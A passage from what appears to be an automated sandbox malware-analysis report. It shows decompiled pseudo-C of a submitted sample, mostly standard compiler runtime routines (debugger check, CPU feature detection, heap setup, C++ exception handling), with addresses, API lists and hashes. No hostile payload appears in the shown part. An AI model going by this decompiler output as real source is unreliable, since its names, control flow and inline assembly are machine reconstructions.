				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0040195A(_t41);
					_pop(_t61);
				}
				E004020F0(_t66,  &_v804, 0, 0x50);
				E004020F0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_t23 =  &_v0; // 0x0
				_v540 =  *_t23;
				_t25 =  &_v0; // 0x41667c
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_t28 = _t49 - 4; // 0xfffffffe
				_v544 =  *_t28;
				_t30 =  &_a8; // 0x0
				_v804 =  *_t30;
				_t32 =  &_a12; // 0xfffffffe
				_v800 =  *_t32;
				_t34 =  &_v0; // 0x0
				_v792 =  *_t34;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // 0x416350
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_t38 =  &_a4; // 0xffffffd0
					_push( *_t38);
					_t57 = E0040195A(_t57);
				}
				_t39 =  &_v8; // 0x0
				return E00401BE5(_t57, _t60,  *_t39 ^ _t69, _t65, _t67, _t68);
			}






































                                                              0x0040636b
                                                              0x0040636b
                                                              0x0040636b
                                                              0x00406376
                                                              0x0040637b
                                                              0x0040637d
                                                              0x00406385
                                                              0x00406387
                                                              0x0040638a
                                                              0x0040638f
                                                              0x0040638f
                                                              0x0040639b
                                                              0x004063ae
                                                              0x004063bc
                                                              0x004063c2
                                                              0x004063c8
                                                              0x004063ce
                                                              0x004063d4
                                                              0x004063da
                                                              0x004063e0
                                                              0x004063e6
                                                              0x004063ec
                                                              0x004063f2
                                                              0x004063f9
                                                              0x00406400
                                                              0x00406407
                                                              0x0040640e
                                                              0x00406415
                                                              0x0040641c
                                                              0x0040641d
                                                              0x00406423
                                                              0x00406426
                                                              0x0040642c
                                                              0x0040642c
                                                              0x0040642f
                                                              0x00406435
                                                              0x0040643f
                                                              0x00406442
                                                              0x00406448
                                                              0x0040644b
                                                              0x00406451
                                                              0x00406454
                                                              0x0040645a
                                                              0x0040645d
                                                              0x0040646b
                                                              0x0040646d
                                                              0x00406473
                                                              0x00406482
                                                              0x0040648e
                                                              0x0040648e
                                                              0x00406491
                                                              0x00406496
                                                              0x00406497
                                                              0x004064a3

                                                              APIs
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00406463
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0040646D
                                                              • UnhandledExceptionFilter.KERNEL32(00416350,?,?,?,?,?,?), ref: 0040647A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                              • String ID: xfA
                                                              • API String ID: 3906539128-2547998173
                                                              • Opcode ID: ab89187c494adc915da360c4805c5dc327673be7f69fda436567295ad0e905a3
                                                              • Instruction ID: 27c9b2d5d83fa03b24cdeef42b518778bdbb3f72f2c29e3cb957f73c7f56a9f2
                                                              • Opcode Fuzzy Hash: ab89187c494adc915da360c4805c5dc327673be7f69fda436567295ad0e905a3
                                                              • Instruction Fuzzy Hash: D931E57494121C9BCB21DF65D9887CDBBB4BF08310F5081EAE50DA72A0EB749F818F58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401796 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 85%
                                                              			E00401796(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E0040195A(_t34);
				 *_t60 = 0x2cc;
				_v632 = E004020F0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E004020F0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E0040195A(_t49);
				}
				return _t49;
			}


































                                                              0x00401796
                                                              0x00401796
                                                              0x00401796
                                                              0x004017aa
                                                              0x004017ac
                                                              0x004017af
                                                              0x004017af
                                                              0x004017b3
                                                              0x004017b8
                                                              0x004017d0
                                                              0x004017d6
                                                              0x004017dc
                                                              0x004017e2
                                                              0x004017e8
                                                              0x004017ee
                                                              0x004017f4
                                                              0x004017fb
                                                              0x00401802
                                                              0x00401809
                                                              0x00401810
                                                              0x00401817
                                                              0x0040181e
                                                              0x0040181f
                                                              0x00401828
                                                              0x0040182e
                                                              0x00401831
                                                              0x00401837
                                                              0x00401846
                                                              0x00401852
                                                              0x0040185d
                                                              0x00401864
                                                              0x0040186b
                                                              0x00401876
                                                              0x0040187e
                                                              0x00401887
                                                              0x00401889
                                                              0x0040188c
                                                              0x0040188e
                                                              0x00401898
                                                              0x004018a0
                                                              0x004018a6
                                                              0x00000000
                                                              0x004018ad
                                                              0x004018b0

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004017A2
                                                              • IsDebuggerPresent.KERNEL32 ref: 0040186E
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040188E
                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 00401898
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                              • String ID:
                                                              • API String ID: 254469556-0
                                                              • Opcode ID: 08540eaf6671ec7f696a0aaf15c92f03ad5e830cf6d10267c62a163a4b023842
                                                              • Instruction ID: a683ffaa2d68fa853aa4380f613157507114c95401a7bea838927c74ec0f93fa
                                                              • Opcode Fuzzy Hash: 08540eaf6671ec7f696a0aaf15c92f03ad5e830cf6d10267c62a163a4b023842
                                                              • Instruction Fuzzy Hash: DD313A75D01218DBDB10EFA5D9897CDBBB8BF08304F1081AAE50DA7290EB755B84CF08
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401A05 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 88%
                                                              			E00401A05(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x41896c =  *0x41896c & 0x00000000;
				 *0x418010 =  *0x418010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0x418970; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x418970 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x418010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x41896c = 1;
					 *0x418010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x41896c = 2;
						 *0x418010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x418010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x41896c = 3;
								 *0x418010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x41896c = 5;
									 *0x418010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x418010 =  *0x418010 | 0x00000040;
										 *0x41896c = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x418970; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x418970 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























                                                              0x00401a05
                                                              0x00401a08
                                                              0x00401a12
                                                              0x00401a23
                                                              0x00401bd5
                                                              0x00401bd8
                                                              0x00401bd8
                                                              0x00401a29
                                                              0x00401a2f
                                                              0x00401a34
                                                              0x00401a38
                                                              0x00401a3c
                                                              0x00401a3e
                                                              0x00401a40
                                                              0x00401a43
                                                              0x00401a48
                                                              0x00401a51
                                                              0x00401a62
                                                              0x00401a6d
                                                              0x00401a73
                                                              0x00401a74
                                                              0x00401a7a
                                                              0x00401a7d
                                                              0x00401a87
                                                              0x00401a8a
                                                              0x00401a8d
                                                              0x00401a90
                                                              0x00401ad5
                                                              0x00401ad5
                                                              0x00401adb
                                                              0x00401adb
                                                              0x00401ae0
                                                              0x00401ae1
                                                              0x00401ae7
                                                              0x00401b19
                                                              0x00401ae9
                                                              0x00401aeb
                                                              0x00401aec
                                                              0x00401af2
                                                              0x00401af5
                                                              0x00401af7
                                                              0x00401afa
                                                              0x00401afd
                                                              0x00401b00
                                                              0x00401b03
                                                              0x00401b0c
                                                              0x00401b11
                                                              0x00401b11
                                                              0x00401b0c
                                                              0x00401b1c
                                                              0x00401b21
                                                              0x00401b24
                                                              0x00401b2e
                                                              0x00401b39
                                                              0x00401b3f
                                                              0x00401b42
                                                              0x00401b4c
                                                              0x00401b57
                                                              0x00401b63
                                                              0x00401b66
                                                              0x00401b69
                                                              0x00401b74
                                                              0x00401b79
                                                              0x00401b7b
                                                              0x00401b80
                                                              0x00401b83
                                                              0x00401b8d
                                                              0x00401b95
                                                              0x00401b9a
                                                              0x00401ba4
                                                              0x00401bb2
                                                              0x00401bc5
                                                              0x00401bcc
                                                              0x00401bcc
                                                              0x00401bb2
                                                              0x00401b95
                                                              0x00401b79
                                                              0x00401b57
                                                              0x00000000
                                                              0x00401bd4
                                                              0x00401a95
                                                              0x00401a9f
                                                              0x00401ac4
                                                              0x00401aca
                                                              0x00401acd
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00401A1B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: FeaturePresentProcessor
                                                              • String ID:
                                                              • API String ID: 2325560087-0
                                                              • Opcode ID: 444eac7619679f0b1c908bb5714ddf954d856699ccdef152b9532d6ef9c270d5
                                                              • Instruction ID: 373c9e0b331e01b867620f19eefc06ae9d0af40db80eaee874182935490031f7
                                                              • Opcode Fuzzy Hash: 444eac7619679f0b1c908bb5714ddf954d856699ccdef152b9532d6ef9c270d5
                                                              • Instruction Fuzzy Hash: BC512CB1A116498BDB18CF55D8857AABBF0FB48314F25C47AD411EB3A0E7789940CF58
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040B0AF Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E0040B0AF() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x41931c = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                              0x0040b0af
                                                              0x0040b0b7
                                                              0x0040b0bf

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: HeapProcess
                                                              • String ID:
                                                              • API String ID: 54951025-0
                                                              • Opcode ID: 2a9567a9e267271494f45bdb79e66690527d5ec8c2dee9d2a85c32e1b9fd09d0
                                                              • Instruction ID: 74de3031397c736b7dccde65fcb57def8cf328ed7ad9373991e44c4c279619cd
                                                              • Opcode Fuzzy Hash: 2a9567a9e267271494f45bdb79e66690527d5ec8c2dee9d2a85c32e1b9fd09d0
                                                              • Instruction Fuzzy Hash: FCA02230E00300CF8B00CF32AE0838C3FEABA0C2C0300C038E800C20B0EB3088808F08
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0040333B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              C-Code - Quality: 71%
                                                              			E0040333B(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t201;
				signed int _t202;
				char _t203;
				signed int _t205;
				signed int _t207;
				signed char* _t208;
				signed int _t209;
				signed int _t210;
				signed int _t214;
				void* _t217;
				signed char* _t220;
				void* _t222;
				void* _t224;
				signed char _t228;
				signed int _t229;
				void* _t231;
				void* _t234;
				void* _t237;
				signed int _t247;
				void* _t250;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr _t253;
				signed int _t254;
				void* _t259;
				void* _t264;
				void* _t265;
				signed int _t269;
				signed char* _t270;
				intOrPtr* _t271;
				signed char _t272;
				signed int _t273;
				signed int _t274;
				intOrPtr* _t276;
				signed int _t277;
				signed int _t278;
				signed int _t283;
				signed int _t290;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed char* _t297;
				signed int _t298;
				signed char _t299;
				signed int* _t301;
				signed char* _t304;
				signed int _t314;
				signed int _t315;
				signed int _t317;
				signed int _t327;
				void* _t329;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;

				_t296 = __edx;
				_push(_t315);
				_t301 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t275 = E00403EF9(_a8, _a16, _t301);
				_t332 = _t331 + 0xc;
				_v12 = _t275;
				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
					L67:
					_t201 = E0040623E(_t270, _t275, _t296, _t315);
					asm("int3");
					_t329 = _t332;
					_t333 = _t332 - 0x38;
					_push(_t270);
					_t271 = _v112;
					__eflags =  *_t271 - 0x80000003;
					if( *_t271 == 0x80000003) {
						return _t201;
					} else {
						_push(_t315);
						_push(_t301);
						_t202 = E00402403(_t271, _t275, _t296, _t315);
						__eflags =  *(_t202 + 8);
						if( *(_t202 + 8) != 0) {
							__imp__EncodePointer(0);
							_t315 = _t202;
							_t222 = E00402403(_t271, _t275, _t296, _t315);
							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
								__eflags =  *_t271 - 0xe0434f4d;
								if( *_t271 != 0xe0434f4d) {
									__eflags =  *_t271 - 0xe0434352;
									if( *_t271 != 0xe0434352) {
										_t214 = E00402881(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
										_t333 = _t333 + 0x1c;
										__eflags = _t214;
										if(_t214 != 0) {
											L84:
											return _t214;
										}
									}
								}
							}
						}
						_t203 = _a16;
						_v28 = _t203;
						_v24 = 0;
						__eflags =  *(_t203 + 0xc);
						if( *(_t203 + 0xc) > 0) {
							_push(_a24);
							E004027B4(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
							_t298 = _v40;
							_t334 = _t333 + 0x18;
							_t214 = _v44;
							_v20 = _t214;
							_v12 = _t298;
							__eflags = _t298 - _v32;
							if(_t298 >= _v32) {
								goto L84;
							}
							_t277 = _t298 * 0x14;
							__eflags = _t277;
							_v16 = _t277;
							do {
								_t278 = 5;
								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
								_t334 = _t334 + 0xc;
								__eflags = _v64 - _t217;
								if(_v64 > _t217) {
									goto L83;
								}
								__eflags = _t217 - _v60;
								if(_t217 > _v60) {
									goto L83;
								}
								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t283 = _t220[4];
								__eflags = _t283;
								if(_t283 == 0) {
									L81:
									__eflags =  *_t220 & 0x00000040;
									if(( *_t220 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E004032BB(_t298, _t271, _a4, _a8, _a12, _a16, _t220, 0,  &_v64, _a24, _a28);
										_t298 = _v12;
										_t334 = _t334 + 0x30;
									}
									goto L83;
								}
								__eflags =  *((char*)(_t283 + 8));
								if( *((char*)(_t283 + 8)) != 0) {
									goto L83;
								}
								goto L81;
								L83:
								_t298 = _t298 + 1;
								_t214 = _v20;
								_t277 = _v16 + 0x14;
								_v12 = _t298;
								_v16 = _t277;
								__eflags = _t298 - _v32;
							} while (_t298 < _v32);
							goto L84;
						}
						E0040623E(_t271, _t275, _t296, _t315);
						asm("int3");
						_push(_t329);
						_t297 = _v184;
						_push(_t271);
						_push(_t315);
						_push(0);
						_t205 = _t297[4];
						__eflags = _t205;
						if(_t205 == 0) {
							L109:
							_t207 = 1;
							__eflags = 1;
						} else {
							_t276 = _t205 + 8;
							__eflags =  *_t276;
							if( *_t276 == 0) {
								goto L109;
							} else {
								__eflags =  *_t297 & 0x00000080;
								_t304 = _v0;
								if(( *_t297 & 0x00000080) == 0) {
									L91:
									_t272 = _t304[4];
									_t317 = 0;
									__eflags = _t205 - _t272;
									if(_t205 == _t272) {
										L101:
										__eflags =  *_t304 & 0x00000002;
										if(( *_t304 & 0x00000002) == 0) {
											L103:
											_t208 = _a4;
											__eflags =  *_t208 & 0x00000001;
											if(( *_t208 & 0x00000001) == 0) {
												L105:
												__eflags =  *_t208 & 0x00000002;
												if(( *_t208 & 0x00000002) == 0) {
													L107:
													_t317 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t297 & 0x00000002;
													if(( *_t297 & 0x00000002) != 0) {
														goto L107;
													}
												}
											} else {
												__eflags =  *_t297 & 0x00000001;
												if(( *_t297 & 0x00000001) != 0) {
													goto L105;
												}
											}
										} else {
											__eflags =  *_t297 & 0x00000008;
											if(( *_t297 & 0x00000008) != 0) {
												goto L103;
											}
										}
										_t207 = _t317;
									} else {
										_t184 = _t272 + 8; // 0x6e
										_t209 = _t184;
										while(1) {
											_t273 =  *_t276;
											__eflags = _t273 -  *_t209;
											if(_t273 !=  *_t209) {
												break;
											}
											__eflags = _t273;
											if(_t273 == 0) {
												L97:
												_t210 = _t317;
											} else {
												_t274 =  *((intOrPtr*)(_t276 + 1));
												__eflags = _t274 -  *((intOrPtr*)(_t209 + 1));
												if(_t274 !=  *((intOrPtr*)(_t209 + 1))) {
													break;
												} else {
													_t276 = _t276 + 2;
													_t209 = _t209 + 2;
													__eflags = _t274;
													if(_t274 != 0) {
														continue;
													} else {
														goto L97;
													}
												}
											}
											L99:
											__eflags = _t210;
											if(_t210 == 0) {
												goto L101;
											} else {
												_t207 = 0;
											}
											goto L110;
										}
										asm("sbb eax, eax");
										_t210 = _t209 | 0x00000001;
										__eflags = _t210;
										goto L99;
									}
								} else {
									__eflags =  *_t304 & 0x00000010;
									if(( *_t304 & 0x00000010) != 0) {
										goto L109;
									} else {
										goto L91;
									}
								}
							}
						}
						L110:
						return _t207;
					}
				} else {
					_t270 = _a4;
					if( *_t270 != 0xe06d7363 || _t270[0x10] != 3 || _t270[0x14] != 0x19930520 && _t270[0x14] != 0x19930521 && _t270[0x14] != 0x19930522) {
						L22:
						_t296 = _a12;
						_v8 = _t296;
						goto L24;
					} else {
						_t315 = 0;
						if(_t270[0x1c] != 0) {
							goto L22;
						} else {
							_t224 = E00402403(_t270, _t275, _t296, 0);
							if( *((intOrPtr*)(_t224 + 0x10)) == 0) {
								L61:
								return _t224;
							} else {
								_t270 =  *(E00402403(_t270, _t275, _t296, 0) + 0x10);
								_t259 = E00402403(_t270, _t275, _t296, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t259 + 0x14));
								if(_t270 == 0 ||  *_t270 == 0xe06d7363 && _t270[0x10] == 3 && (_t270[0x14] == 0x19930520 || _t270[0x14] == 0x19930521 || _t270[0x14] == 0x19930522) && _t270[0x1c] == _t315) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E00402403(_t270, _t275, _t296, _t315) + 0x1c)) == _t315) {
										L23:
										_t296 = _v8;
										_t275 = _v12;
										L24:
										_v52 = _t301;
										_v48 = 0;
										__eflags =  *_t270 - 0xe06d7363;
										if( *_t270 != 0xe06d7363) {
											L57:
											__eflags = _t301[3];
											if(_t301[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t275);
													_push(_t301);
													_push(_a16);
													_push(_t296);
													_push(_a8);
													_push(_t270);
													L68();
													_t332 = _t332 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags = _t270[0x10] - 3;
											if(_t270[0x10] != 3) {
												goto L57;
											} else {
												__eflags = _t270[0x14] - 0x19930520;
												if(_t270[0x14] == 0x19930520) {
													L29:
													_t315 = _a32;
													__eflags = _t301[3];
													if(_t301[3] > 0) {
														_push(_a28);
														E004027B4(_t270, _t275, _t301, _t315,  &_v68,  &_v52, _t275, _a16, _t301);
														_t296 = _v64;
														_t332 = _t332 + 0x18;
														_t247 = _v68;
														_v44 = _t247;
														_v16 = _t296;
														__eflags = _t296 - _v56;
														if(_t296 < _v56) {
															_t290 = _t296 * 0x14;
															__eflags = _t290;
															_v32 = _t290;
															do {
																_t291 = 5;
																_t250 = memcpy( &_v104,  *((intOrPtr*)( *_t247 + 0x10)) + _t290, _t291 << 2);
																_t332 = _t332 + 0xc;
																__eflags = _v104 - _t250;
																if(_v104 <= _t250) {
																	__eflags = _t250 - _v100;
																	if(_t250 <= _v100) {
																		_t294 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t299 = _t270[0x1c];
																			_t251 =  *((intOrPtr*)(_t299 + 0xc));
																			_t252 = _t251 + 4;
																			__eflags = _t252;
																			_v36 = _t252;
																			_t253 = _v88;
																			_v40 =  *_t251;
																			_v24 = _t253;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t327 = _v40;
																				_t314 = _v36;
																				__eflags = _t327;
																				if(_t327 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t299);
																						_push( *_t314);
																						_t254 =  &_v84;
																						_push(_t254);
																						L87();
																						_t332 = _t332 + 0xc;
																						__eflags = _t254;
																						if(_t254 != 0) {
																							break;
																						}
																						_t299 = _t270[0x1c];
																						_t327 = _t327 - 1;
																						_t314 = _t314 + 4;
																						__eflags = _t327;
																						if(_t327 > 0) {
																							continue;
																						} else {
																							_t294 = _v20;
																							_t253 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E004032BB(_t299, _t270, _a8, _v8, _a16, _a20,  &_v84,  *_t314,  &_v104, _a28, _a32);
																					_t332 = _t332 + 0x30;
																				}
																				L43:
																				_t296 = _v16;
																				goto L44;
																				L40:
																				_t294 = _t294 + 1;
																				_t253 = _t253 + 0x10;
																				_v20 = _t294;
																				_v24 = _t253;
																				__eflags = _t294 - _v92;
																			} while (_t294 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t296 = _t296 + 1;
																_t247 = _v44;
																_t290 = _v32 + 0x14;
																_v16 = _t296;
																_v32 = _t290;
																__eflags = _t296 - _v56;
															} while (_t296 < _v56);
															_t301 = _a20;
															_t315 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E00401F30(_t270, _t301, _t315, __eflags);
														_t275 = _t270;
													}
													__eflags = ( *_t301 & 0x1fffffff) - 0x19930521;
													if(( *_t301 & 0x1fffffff) < 0x19930521) {
														L60:
														_t224 = E00402403(_t270, _t275, _t296, _t315);
														__eflags =  *(_t224 + 0x1c);
														if( *(_t224 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t228 = _t301[8] >> 2;
														__eflags = _t301[7];
														if(_t301[7] != 0) {
															__eflags = _t228 & 0x00000001;
															if((_t228 & 0x00000001) == 0) {
																_push(_t301[7]);
																_t229 = E00403DBA(_t270, _t301, _t315, _t270);
																_pop(_t275);
																__eflags = _t229;
																if(_t229 == 0) {
																	goto L64;
																} else {
